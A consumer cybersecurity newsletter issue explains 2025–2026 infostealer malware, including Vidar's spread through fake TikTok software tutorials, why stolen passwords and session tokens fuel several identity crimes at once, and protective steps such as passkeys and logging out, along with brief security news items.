Daylila

Cybersecurity · Thursday, 11 June 2026

01 · Briefing · what happened

Quiet malware copied passwords off 11 million machines — and the thefts left no gap to notice

Cybersecurity 4 min 38 sources

Cheap infostealer malware harvested passwords and login sessions from 11.1 million devices in 2025, and one stolen credential now spreads into several crimes at once.

Key takeaways

  • Cheap malware copied passwords and login sessions from 11.1 million devices in 2025; over 3.3 billion stolen credentials now circulate, and a stolen session token lets an attacker skip even your two-step check.
  • One strain, Vidar, spread through fake "free software" tutorials on TikTok that talked people into running it themselves — no hacking required.
  • A quarter of identity-crime victims now face several crimes at once, because one stolen secret can be copied and reused everywhere; passkeys and logging out shut that door.

The biggest security story this week isn’t a single break-in. It’s a quiet, industrial-scale theft of the small secrets that let you skip the lock — and a growing pile of evidence that once one is taken, the trouble doesn’t stay in one place.

The 3.3 billion stolen keys nobody noticed leaving

Security firm Flashpoint counted more than 11.1 million devices infected in 2025 by a kind of malware called an infostealer — a quiet program that copies what’s already on your machine: saved passwords, browser data, and login tokens, then sends it to the attacker [8]. The haul: over 3.3 billion credentials, browser artifacts, and session details now circulating in criminal marketplaces [8].

Here’s the part worth understanding. A session token is the small file your browser keeps after you log in, so you’re not asked for your password on every click. It is proof you already passed the check — including the second step, the code from your phone. Steal the token and you don’t need the password or the code; you walk in as the already-approved user. As one tally put it, attackers now prefer this route because it’s “quicker, easier, less visible” than forcing a way in [8].

These tools are cheap. Infostealers rent on the underground market for as little as $60 a month [8]. In early 2026 one strain, Vidar, jumped from fourth place to dominate — more than 73% of infected hosts [8].

How Vidar got onto phones: a free-Spotify tutorial

The way Vidar spread this year is almost mundane. Researchers at ReversingLabs found short videos on TikTok and Instagram Reels, dressed up as tutorials for unlocking premium software free [11]. An AI-voiced clip walked viewers through opening PowerShell — a built-in Windows command tool — and pasting in a line of text [11].

That line quietly downloaded and ran Vidar from a lookalike web address, msget[.]run, which some mistook for a Microsoft one [11]. The fake accounts mimicked the official Windows profile, crown icon and all, and chased saves and shares to climb the recommendation feed; one clip drew over 100,000 views and nearly 1,700 saves [11]. No flaw was exploited. The viewer was persuaded to run the program themselves.

If you ever see a video telling you to paste a command into PowerShell or Terminal to “unlock” or “fix” something, that is the attack. Don’t.

One theft, several crimes

What makes this year’s numbers different is what happens after the credential is taken. The US Identity Theft Resource Center, a non-profit that helps victims, analysed over 6,000 reports and found nearly 26% of victims dealt with two or more identity crimes at once — up from 24% a year earlier [16].

The center’s chief programs officer, Mona Terry, named the shift plainly: “A single compromise can trigger a chain reaction that spreads across multiple accounts and institutions” [16]. Account takeovers were half of all misuse cases; unauthorized access to a device or PC jumped 78% in a year and is now the top threat for adults aged 35 to 64 [16]. Recovery is brutal once money is lost — only 9% of victims who lost money reached a resolution, against 53% of those who didn’t [16].

The reason one stolen secret becomes five crimes is worth dwelling on — the lesson takes it apart.

What to do, in order

If you can do one thing: turn on a passkey or an app-based passcode where it’s offered (banks, email, Apple, Google, Microsoft). A passkey can’t be copied off your machine the way a saved password or token can — it stays locked to the device and your fingerprint or face.

Then: stop saving passwords in the browser for anything that holds money or identity, and log out of sensitive sites when you’re done — that ends the session token an infostealer would grab. If an account was ever exposed, change that password everywhere you reused it; reuse is how one breach becomes several.

The rest of the week, briefly

South Korea fined Coupang a record $400m — the country’s largest data-breach penalty ever — over a leak exposing the data of about 37.5 million users, more than half the population [1]. Regulators found poor management of authentication keys and access controls; Coupang plans to appeal [1].

Microsoft patched a record 206 flaws, including three “zero-days” — flaws attackers were already using before any fix existed — and a separate Windows zero-day exploit nicknamed RoguePlanet was released publicly [3][5]. If your Windows updates are set to automatic, this one is handled for you; if not, run them.

The US tightened its patching clock. A new directive from CISA, the federal cyber-defence agency, orders government agencies to fix actively-exploited flaws in as little as three days, down from longer windows, citing how fast attackers now move [7][17]. It applies to agencies, but the logic holds for you too: the gap between “fix exists” and “you installed it” is the window attackers live in.

Researchers also flagged critical flaws in data-center cooling and backup-power systems that could let attackers disrupt the buildings the internet runs on — a reminder that the soft spot is often the boring equipment nobody watches [12].

02 · Lesson · why it matters

The thing that's still yours after it's stolen

Steal a physical key and the owner notices a gap. Steal a password and nothing is missing — which is exactly why one theft quietly becomes many.

A theft that leaves the shelf full

Picture a burglar who takes your house key. You’d know by morning. The hook by the door is empty; the gap tells you. That gap is the whole reason theft has always been self-limiting — the thief gets the key, and you lose it, and now there is one key in one pair of hands.

A stolen password works nothing like that. When an infostealer — the cheap malware that copies what’s already on your computer — lifts your saved login, your copy stays exactly where it was. You log in tomorrow as normal. Nothing on your screen is missing. The shelf is still full. And yet the same secret is now sitting in a criminal marketplace, available to anyone who pays, doing the same job in a thousand other hands at once [8].

This is the quiet fact under this week’s numbers. Eleven million devices copied in a single year. Over three billion credentials in circulation [8]. None of those copies emptied a hook. That’s why nobody noticed.

Some things lose nothing by being shared

There’s a name for the property that makes a password different from a key. Economists call goods like a sandwich rivalrous — if I eat it, you can’t. A key is rivalrous. A seat on a train is rivalrous. Most of the things we’ve built our instincts around are rivalrous, so our sense of “stolen” carries a built-in comfort: if they have it, I don’t, and at least I’ll know.

Information is not rivalrous. A number, a phrase, a file — copying it costs almost nothing and takes nothing from the original. This is wonderful when you want to share a recipe or a song. It is the exact same property that makes a stolen credential so dangerous. The secret that protects your bank account is, mechanically, just a string of characters. It can be in your password manager and on a hacker’s hard drive and in fifty other buyers’ tools, all at the same moment, all fully working.

Your defenses were built for the rivalrous world. “Did anyone take my key?” is answerable. “Is my password also somewhere else right now?” usually isn’t.

Why one theft becomes five crimes

Now the chain reaction makes sense. The Identity Theft Resource Center found that a quarter of victims now face two or more identity crimes at the same time, and named why: one compromise “can trigger a chain reaction that spreads across multiple accounts and institutions” [16].

It spreads because the stolen thing copies freely. A single password, reused across your email and your shopping and your bank, isn’t one lock — it’s the same lock fitted to five doors, and the copied key opens all of them. A stolen session token — the small proof-of-login your browser keeps so it won’t ask for your password every click — is worse still: it’s a key that has already passed the guard, including the code from your phone, so it walks the copier straight past the check you thought protected you [8]. None of this requires breaking anything. It requires copying one thing that was never diminished by being copied.

The trick is to persuade you, not to break in

Notice what the attackers spent their effort on. Not picking a lock — getting you to hand over the copy. Vidar spread this year through fake “free Spotify” tutorials on TikTok, an AI voice walking viewers through pasting a command that quietly installed the malware themselves [11]. No flaw was exploited. The strongest part of your security — the part that asks “are you sure?” — was simply talked around.

That’s the shape of it once the valuable thing is copyable: the contest stops being about strength and becomes about persuasion and reach. A cheap copy, spread to a hundred thousand viewers, only needs to work on a few [11]. The economics flip entirely from the burglar’s. He could rob one house a night. A copied credential robs at the speed of a download.

What you’re actually inside

Here’s the part that’s easy to miss from your own chair. You feel like the owner of your passwords — they’re yours, in your manager, behind your face-scan. But in a world of copyable secrets, “yours” doesn’t mean “only yours.” The same property that lets you sync your logins across your phone and laptop is the property that lets a thief run them in parallel with you, unseen.

And you are not standing outside this. Every person who reuses a password, saves a card in a browser, or stays logged in is holding a copyable key — and the system treats every copy as the real owner, because it cannot tell them apart. The reason the better tools work is that they break the copy. A passkey stays welded to your device and your fingerprint; lift the file and it’s useless elsewhere [16]. Logging out ends the session token before anyone can grab a working copy.

The honest version of the lesson is small and a little humbling. The locks you trusted were built for a world where stealing something meant the owner lost it. Most of what’s worth protecting about you now is the kind of thing that can be taken without ever leaving — which means the only safe assumption is that a copy already could be out there, and the question worth asking is not “did I lose it?” but “can it still be copied at all?”

03 · Lab · your turn

The Copy Test

Rehearse which secrets survive a device theft because they can't be copied, and feel why one copyable password becomes many crimes.

More from Cybersecurity

Hundreds of trusted software packages were quietly hijacked — the name stayed the same, the recipe didn't Security teams are drowning in alerts — and the warning that matters keeps slipping through A spyware firm a court told to stop went after WhatsApp users anyway

Across the beats

An investor wants the studio behind Elden Ring to "maximise earnings" — and the dev says that's the threat The Chiefs gave Mahomes a half-billion dollars — and locked themselves in The fertilizer price spike from the Iran war is quietly unwinding — and dragging crops down with it